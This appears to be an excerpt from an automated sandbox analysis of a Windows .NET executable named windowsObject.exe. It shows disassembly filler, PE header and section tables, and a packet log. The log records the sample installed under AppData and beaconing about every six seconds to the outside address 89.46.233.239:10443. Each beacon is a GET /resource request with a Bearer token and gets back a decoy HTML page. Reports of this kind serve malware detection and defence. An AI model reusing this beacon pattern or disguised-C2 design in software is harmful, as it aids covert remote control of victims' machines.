          add byte ptr [eax], al
          add byte ptr [eax], al
          add dword ptr [eax], eax
          add byte ptr [eax], al
          add dword ptr [eax], eax
          add byte ptr [eax], al
          add al, byte ptr [eax]
          add byte ptr [eax], al
          add eax, dword ptr [eax]
          add byte ptr [eax], al
          add eax, 08000000h
          add byte ptr [eax], al
          add byte ptr [15000000h], cl
          add byte ptr [eax], al
          add byte ptr [edx], ah
          add byte ptr [eax], al
          add byte ptr [edi], dh
          add byte ptr [eax], al
          add byte ptr [edx], al
          add byte ptr [eax], al
          add byte ptr [ebx], al
          add byte ptr [eax], al
          add byte ptr [07000000h], al
          add byte ptr [eax], al
          add byte ptr [ebx], cl
          add byte ptr [eax], al
          add byte ptr [11000000h], cl
          add byte ptr [eax], al
          add byte ptr [ebx], dl
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x141140x4f.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x1c28.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x140f80x1c.text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x20000x121b80x1220020a12407b43279cd431b9f10e970afffFalse0.3464978448275862HA archive data 1 file, first is type CPY4.158951699170872IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rsrc0x160000x1c280x1e00ca858955b5ad341e5bcd8dd0832b5f0fFalse0.7950520833333333data7.0782789679514355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x180000xc0x2002c9c48cb0ff82bbd67d5c89118a260d9False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountryZLIB Complexity
          RT_ICON0x161000x15d6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9559928443649374
          RT_GROUP_ICON0x176e80x14data1.05
          RT_VERSION0x1770c0x31cdata0.4183417085427136
          RT_MANIFEST0x17a380x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
          DLLImport
          mscoree.dll_CorExeMain
          DescriptionData
          Translation0x0000 0x04b0
          Comments
          CompanyName
          FileDescriptionwindowsObject
          FileVersion1.0.0.0
          InternalNamewindowsObject.exe
          LegalCopyright
          LegalTrademarks
          OriginalFilenamewindowsObject.exe
          ProductNamewindowsObject
          ProductVersion1.0.0.0
          Assembly Version1.0.0.0

          Network Behavior

          Download Network PCAP: filteredfull

          TimestampSource PortDest PortSource IPDest IP
          Mar 12, 2025 17:37:40.134552956 CET4972110443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:40.139349937 CET104434972189.46.233.239192.168.2.4
          Mar 12, 2025 17:37:40.139476061 CET4972110443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:40.143381119 CET4972110443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:40.148063898 CET104434972189.46.233.239192.168.2.4
          Mar 12, 2025 17:37:41.406804085 CET104434972189.46.233.239192.168.2.4
          Mar 12, 2025 17:37:41.406826973 CET104434972189.46.233.239192.168.2.4
          Mar 12, 2025 17:37:41.406852961 CET104434972189.46.233.239192.168.2.4
          Mar 12, 2025 17:37:41.406864882 CET104434972189.46.233.239192.168.2.4
          Mar 12, 2025 17:37:41.406924963 CET4972110443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:41.406965017 CET4972110443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:41.407258034 CET4972110443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:41.411926985 CET104434972189.46.233.239192.168.2.4
          Mar 12, 2025 17:37:46.542702913 CET4972210443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:46.547493935 CET104434972289.46.233.239192.168.2.4
          Mar 12, 2025 17:37:46.547585011 CET4972210443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:46.547920942 CET4972210443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:46.552593946 CET104434972289.46.233.239192.168.2.4
          Mar 12, 2025 17:37:47.417179108 CET104434972289.46.233.239192.168.2.4
          Mar 12, 2025 17:37:47.417197943 CET104434972289.46.233.239192.168.2.4
          Mar 12, 2025 17:37:47.417320967 CET4972210443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:47.417406082 CET104434972289.46.233.239192.168.2.4
          Mar 12, 2025 17:37:47.417417049 CET104434972289.46.233.239192.168.2.4
          Mar 12, 2025 17:37:47.417433023 CET104434972289.46.233.239192.168.2.4
          Mar 12, 2025 17:37:47.417480946 CET4972210443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:47.417552948 CET4972210443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:47.422187090 CET104434972289.46.233.239192.168.2.4
          Mar 12, 2025 17:37:52.542623043 CET4972310443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:52.547491074 CET104434972389.46.233.239192.168.2.4
          Mar 12, 2025 17:37:52.547611952 CET4972310443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:52.548002005 CET4972310443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:52.552702904 CET104434972389.46.233.239192.168.2.4
          Mar 12, 2025 17:37:53.477308035 CET104434972389.46.233.239192.168.2.4
          Mar 12, 2025 17:37:53.477336884 CET104434972389.46.233.239192.168.2.4
          Mar 12, 2025 17:37:53.477425098 CET4972310443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:53.478241920 CET104434972389.46.233.239192.168.2.4
          Mar 12, 2025 17:37:53.478290081 CET104434972389.46.233.239192.168.2.4
          Mar 12, 2025 17:37:53.478343964 CET104434972389.46.233.239192.168.2.4
          Mar 12, 2025 17:37:53.478351116 CET4972310443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:53.478408098 CET4972310443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:53.478436947 CET4972310443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:53.483056068 CET104434972389.46.233.239192.168.2.4
          Mar 12, 2025 17:37:58.605309010 CET4972410443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:58.610198975 CET104434972489.46.233.239192.168.2.4
          Mar 12, 2025 17:37:58.610311031 CET4972410443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:58.610642910 CET4972410443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:58.615300894 CET104434972489.46.233.239192.168.2.4
          Mar 12, 2025 17:37:59.484772921 CET104434972489.46.233.239192.168.2.4
          Mar 12, 2025 17:37:59.484805107 CET104434972489.46.233.239192.168.2.4
          Mar 12, 2025 17:37:59.484816074 CET104434972489.46.233.239192.168.2.4
          Mar 12, 2025 17:37:59.484982967 CET4972410443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:59.485269070 CET104434972489.46.233.239192.168.2.4
          Mar 12, 2025 17:37:59.485284090 CET104434972489.46.233.239192.168.2.4
          Mar 12, 2025 17:37:59.485304117 CET104434972489.46.233.239192.168.2.4
          Mar 12, 2025 17:37:59.485447884 CET4972410443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:59.485510111 CET4972410443192.168.2.489.46.233.239
          Mar 12, 2025 17:37:59.490130901 CET104434972489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:04.605309010 CET4972610443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:04.610115051 CET104434972689.46.233.239192.168.2.4
          Mar 12, 2025 17:38:04.610188961 CET4972610443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:04.610944986 CET4972610443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:04.615590096 CET104434972689.46.233.239192.168.2.4
          Mar 12, 2025 17:38:05.496951103 CET104434972689.46.233.239192.168.2.4
          Mar 12, 2025 17:38:05.496964931 CET104434972689.46.233.239192.168.2.4
          Mar 12, 2025 17:38:05.497049093 CET4972610443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:05.497402906 CET104434972689.46.233.239192.168.2.4
          Mar 12, 2025 17:38:05.497411966 CET104434972689.46.233.239192.168.2.4
          Mar 12, 2025 17:38:05.497426987 CET104434972689.46.233.239192.168.2.4
          Mar 12, 2025 17:38:05.497458935 CET4972610443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:05.497477055 CET4972610443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:05.497617006 CET4972610443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:05.502335072 CET104434972689.46.233.239192.168.2.4
          Mar 12, 2025 17:38:10.620650053 CET4972710443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:10.625452042 CET104434972789.46.233.239192.168.2.4
          Mar 12, 2025 17:38:10.625554085 CET4972710443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:10.625745058 CET4972710443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:10.630404949 CET104434972789.46.233.239192.168.2.4
          Mar 12, 2025 17:38:11.492712975 CET104434972789.46.233.239192.168.2.4
          Mar 12, 2025 17:38:11.492794991 CET104434972789.46.233.239192.168.2.4
          Mar 12, 2025 17:38:11.492841959 CET104434972789.46.233.239192.168.2.4
          Mar 12, 2025 17:38:11.492980957 CET4972710443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:11.493165016 CET104434972789.46.233.239192.168.2.4
          Mar 12, 2025 17:38:11.493212938 CET104434972789.46.233.239192.168.2.4
          Mar 12, 2025 17:38:11.493225098 CET4972710443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:11.493268967 CET104434972789.46.233.239192.168.2.4
          Mar 12, 2025 17:38:11.493335009 CET4972710443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:11.493542910 CET4972710443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:11.498184919 CET104434972789.46.233.239192.168.2.4
          Mar 12, 2025 17:38:16.620347023 CET4972810443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:16.625143051 CET104434972889.46.233.239192.168.2.4
          Mar 12, 2025 17:38:16.625235081 CET4972810443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:16.625381947 CET4972810443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:16.630142927 CET104434972889.46.233.239192.168.2.4
          Mar 12, 2025 17:38:17.503053904 CET104434972889.46.233.239192.168.2.4
          Mar 12, 2025 17:38:17.503071070 CET104434972889.46.233.239192.168.2.4
          Mar 12, 2025 17:38:17.503144979 CET4972810443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:17.503515005 CET104434972889.46.233.239192.168.2.4
          Mar 12, 2025 17:38:17.503551006 CET104434972889.46.233.239192.168.2.4
          Mar 12, 2025 17:38:17.503563881 CET104434972889.46.233.239192.168.2.4
          Mar 12, 2025 17:38:17.503593922 CET4972810443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:17.503607035 CET4972810443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:17.608035088 CET4972810443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:17.612715960 CET104434972889.46.233.239192.168.2.4
          Mar 12, 2025 17:38:22.731324911 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:22.736087084 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:22.736176968 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:22.736578941 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:22.741276026 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601264954 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601296902 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601309061 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601401091 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:23.601636887 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601649046 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601686001 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:23.601705074 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:23.601742983 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:23.601809978 CET4972910443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:23.607397079 CET104434972989.46.233.239192.168.2.4
          Mar 12, 2025 17:38:28.731298923 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:28.736119032 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:28.736226082 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:28.736511946 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:28.741184950 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.609715939 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.609735012 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.609819889 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:29.610229015 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.610239029 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.610259056 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:29.610289097 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:29.610316992 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:29.610383987 CET4973010443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:29.615040064 CET104434973089.46.233.239192.168.2.4
          Mar 12, 2025 17:38:34.729855061 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:34.734641075 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:34.734775066 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:34.735253096 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:34.739933968 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607688904 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607707977 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607762098 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:35.607920885 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607930899 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.607942104 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:35.608036995 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:35.608036995 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:35.608083010 CET4973110443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:35.612689018 CET104434973189.46.233.239192.168.2.4
          Mar 12, 2025 17:38:40.731575012 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:40.737349033 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:40.737430096 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:40.737560034 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:40.742981911 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.610940933 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611360073 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611422062 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:41.611459970 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611942053 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611953020 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.611972094 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:41.612000942 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:41.612013102 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:41.612263918 CET4973210443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:41.617561102 CET104434973289.46.233.239192.168.2.4
          Mar 12, 2025 17:38:47.178045034 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:47.182823896 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:47.182905912 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:47.190242052 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:47.416965961 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:47.729353905 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:48.233757019 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:48.233942032 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:48.233959913 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:48.233975887 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:48.235621929 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.117772102 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.117789030 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.117880106 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:49.118165970 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.118177891 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.118192911 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:49.118227959 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:49.118288994 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:49.118331909 CET4973310443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:49.123006105 CET104434973389.46.233.239192.168.2.4
          Mar 12, 2025 17:38:54.245462894 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:54.250289917 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:54.250406981 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:54.250559092 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:54.255194902 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.144752979 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.144892931 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.144903898 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.144975901 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:55.145294905 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.145306110 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.145320892 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:38:55.145353079 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:55.145385981 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:55.145483971 CET4973410443192.168.2.489.46.233.239
          Mar 12, 2025 17:38:55.150135040 CET104434973489.46.233.239192.168.2.4
          Mar 12, 2025 17:39:00.276686907 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:00.281718016 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:00.281820059 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:00.281969070 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:00.286617041 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.175746918 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.175764084 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.175981045 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:01.176054001 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.176064968 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.176085949 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:01.176111937 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:01.176126957 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:01.176209927 CET4973510443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:01.180840969 CET104434973589.46.233.239192.168.2.4
          Mar 12, 2025 17:39:06.307951927 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:06.314810038 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:06.317099094 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:06.317131996 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:06.324215889 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195157051 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195183992 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195199013 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195310116 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:07.195583105 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195595026 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195633888 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:07.195651054 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:07.195730925 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:07.195789099 CET4973610443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:07.200398922 CET104434973689.46.233.239192.168.2.4
          Mar 12, 2025 17:39:12.404369116 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:12.409195900 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:12.409399986 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:12.409554958 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:12.414191961 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.351949930 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.351972103 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.352000952 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.352025032 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:13.354629993 CET104434973789.46.233.239192.168.2.4
          Mar 12, 2025 17:39:13.354681015 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:13.358231068 CET4973710443192.168.2.489.46.233.239
          Mar 12, 2025 17:39:13.365622997 CET104434973789.46.233.239192.168.2.4

          HTTP Request Dependency Graph

          • 89.46.233.239

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.44972189.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:37:40.143381119 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer SLFDCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:37:41.406804085 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:37:41 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.44972289.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:37:46.547920942 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer XLJFCoiLjWhLcClHKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:37:47.417179108 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:37:47 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
